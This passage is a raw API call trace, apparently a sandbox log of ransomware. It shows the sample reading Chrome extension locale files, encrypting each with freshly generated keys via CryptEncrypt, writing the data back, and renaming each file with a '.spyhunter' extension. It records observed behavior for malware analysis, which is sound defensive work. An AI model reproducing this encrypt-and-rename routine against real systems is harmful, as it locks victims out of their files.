HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json") returned 155 [0136.197] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.198] GetProcessHeap () returned 0x2c0000 [0136.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.198] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f254, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f254*=0xda, lpOverlapped=0x0) returned 1 [0136.198] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.198] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x270f254, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f254*=0xda, lpOverlapped=0x0) returned 1 [0136.199] GetProcessHeap () returned 0x2c0000 [0136.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.199] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.199] WriteFile (in: hFile=0x17c, lpBuffer=0x270f294*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f254, lpOverlapped=0x0 | out: lpBuffer=0x270f294*, lpNumberOfBytesWritten=0x270f254*=0x4, lpOverlapped=0x0) returned 1 [0136.199] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f254, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f254*=0x30, lpOverlapped=0x0) returned 1 [0136.199] CloseHandle (hObject=0x17c) returned 1 [0136.199] GetProcessHeap () returned 0x2c0000 [0136.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.199] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.spyhunter") returned 165 [0136.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\cs\\messages.json.spyhunter")) returned 1 [0136.200] GetProcessHeap () returned 0x2c0000 [0136.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.200] GetProcessHeap () returned 0x2c0000 [0136.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.200] GetProcessHeap () returned 0x2c0000 [0136.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7fed8 | out: hHeap=0x2c0000) returned 1 [0136.201] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f290 | out: pbBuffer=0x270f290) returned 1 [0136.201] GetProcessHeap () returned 0x2c0000 [0136.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.201] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f288*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f288*=0x30) returned 1 [0136.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.202] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json") returned 155 [0136.202] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.202] GetProcessHeap () returned 0x2c0000 [0136.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.202] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f24c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f24c*=0xe5, lpOverlapped=0x0) returned 1 [0136.203] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.203] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x270f24c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f24c*=0xe5, lpOverlapped=0x0) returned 1 [0136.203] GetProcessHeap () returned 0x2c0000 [0136.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.203] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.203] WriteFile (in: hFile=0x17c, lpBuffer=0x270f28c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f24c, lpOverlapped=0x0 | out: lpBuffer=0x270f28c*, lpNumberOfBytesWritten=0x270f24c*=0x4, lpOverlapped=0x0) returned 1 [0136.203] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f24c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f24c*=0x30, lpOverlapped=0x0) returned 1 [0136.204] CloseHandle (hObject=0x17c) returned 1 [0136.204] GetProcessHeap () returned 0x2c0000 [0136.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.204] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.spyhunter") returned 165 [0136.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.spyhunter")) returned 1 [0136.205] GetProcessHeap () returned 0x2c0000 [0136.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.205] GetProcessHeap () returned 0x2c0000 [0136.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.205] GetProcessHeap () returned 0x2c0000 [0136.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f730 | out: hHeap=0x2c0000) returned 1 [0136.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f288 | out: pbBuffer=0x270f288) returned 1 [0136.206] GetProcessHeap () returned 0x2c0000 [0136.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.206] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f280*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f280*=0x30) returned 1 [0136.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.207] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json") returned 155 [0136.207] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.207] GetProcessHeap () returned 0x2c0000 [0136.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.207] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f244, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f244*=0x12f, lpOverlapped=0x0) returned 1 [0136.308] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xfffffed1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.308] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x12f, lpNumberOfBytesWritten=0x270f244, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f244*=0x12f, lpOverlapped=0x0) returned 1 [0136.308] GetProcessHeap () returned 0x2c0000 [0136.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.308] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.308] WriteFile (in: hFile=0x17c, lpBuffer=0x270f284*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f244, lpOverlapped=0x0 | out: lpBuffer=0x270f284*, lpNumberOfBytesWritten=0x270f244*=0x4, lpOverlapped=0x0) returned 1 [0136.309] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f244, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f244*=0x30, lpOverlapped=0x0) returned 1 [0136.309] CloseHandle (hObject=0x17c) returned 1 [0136.309] GetProcessHeap () returned 0x2c0000 [0136.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.309] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.spyhunter") returned 165 [0136.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.spyhunter")) returned 1 [0136.309] GetProcessHeap () returned 0x2c0000 [0136.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.310] GetProcessHeap () returned 0x2c0000 [0136.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.310] GetProcessHeap () returned 0x2c0000 [0136.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f8b8 | out: hHeap=0x2c0000) returned 1 [0136.311] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f280 | out: pbBuffer=0x270f280) returned 1 [0136.311] GetProcessHeap () returned 0x2c0000 [0136.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.311] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f278*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f278*=0x30) returned 1 [0136.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.312] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json") returned 155 [0136.312] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.312] GetProcessHeap () returned 0x2c0000 [0136.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.312] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f23c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f23c*=0xdd, lpOverlapped=0x0) returned 1 [0136.313] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.313] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0x270f23c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f23c*=0xdd, lpOverlapped=0x0) returned 1 [0136.313] GetProcessHeap () returned 0x2c0000 [0136.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.313] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.313] WriteFile (in: hFile=0x17c, lpBuffer=0x270f27c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f23c, lpOverlapped=0x0 | out: lpBuffer=0x270f27c*, lpNumberOfBytesWritten=0x270f23c*=0x4, lpOverlapped=0x0) returned 1 [0136.313] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f23c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f23c*=0x30, lpOverlapped=0x0) returned 1 [0136.313] CloseHandle (hObject=0x17c) returned 1 [0136.313] GetProcessHeap () returned 0x2c0000 [0136.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.314] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.spyhunter") returned 165 [0136.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\he\\messages.json.spyhunter")) returned 1 [0136.314] GetProcessHeap () returned 0x2c0000 [0136.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.315] GetProcessHeap () returned 0x2c0000 [0136.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.315] GetProcessHeap () returned 0x2c0000 [0136.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7f88 | out: hHeap=0x2c0000) returned 1 [0136.316] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f278 | out: pbBuffer=0x270f278) returned 1 [0136.316] GetProcessHeap () returned 0x2c0000 [0136.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.316] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f270*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f270*=0x30) returned 1 [0136.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.317] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json") returned 155 [0136.317] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.317] GetProcessHeap () returned 0x2c0000 [0136.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.317] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f234, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f234*=0xd7, lpOverlapped=0x0) returned 1 [0136.318] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.318] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x270f234, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f234*=0xd7, lpOverlapped=0x0) returned 1 [0136.318] GetProcessHeap () returned 0x2c0000 [0136.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0136.318] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.318] WriteFile (in: hFile=0x17c, lpBuffer=0x270f274*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f234, lpOverlapped=0x0 | out: lpBuffer=0x270f274*, lpNumberOfBytesWritten=0x270f234*=0x4, lpOverlapped=0x0) returned 1 [0136.318] WriteFile (in: hFile=0x17c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f234, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270f234*=0x30, lpOverlapped=0x0) returned 1 [0136.318] CloseHandle (hObject=0x17c) returned 1 [0136.318] GetProcessHeap () returned 0x2c0000 [0136.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.318] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.spyhunter") returned 165 [0136.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fr\\messages.json.spyhunter")) returned 1 [0136.319] GetProcessHeap () returned 0x2c0000 [0136.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.319] GetProcessHeap () returned 0x2c0000 [0136.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0136.319] GetProcessHeap () returned 0x2c0000 [0136.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc7c78 | out: hHeap=0x2c0000) returned 1 [0136.320] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f270 | out: pbBuffer=0x270f270) returned 1 [0136.320] GetProcessHeap () returned 0x2c0000 [0136.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0136.320] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270f268*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270f268*=0x30) returned 1 [0136.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0136.321] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\messages.json") returned 156 [0136.321] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.321] GetProcessHeap () returned 0x2c0000 [0136.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0136.321] ReadFile (in: hFile=0x17c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f22c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f22c*=0xdb, lpOverlapped=0x0) returned 1 [0136.322] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffff25, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.322] WriteFile (in: hFile=0x17c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xdb, lpNumberOfBytesWritten=0x270f22c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, 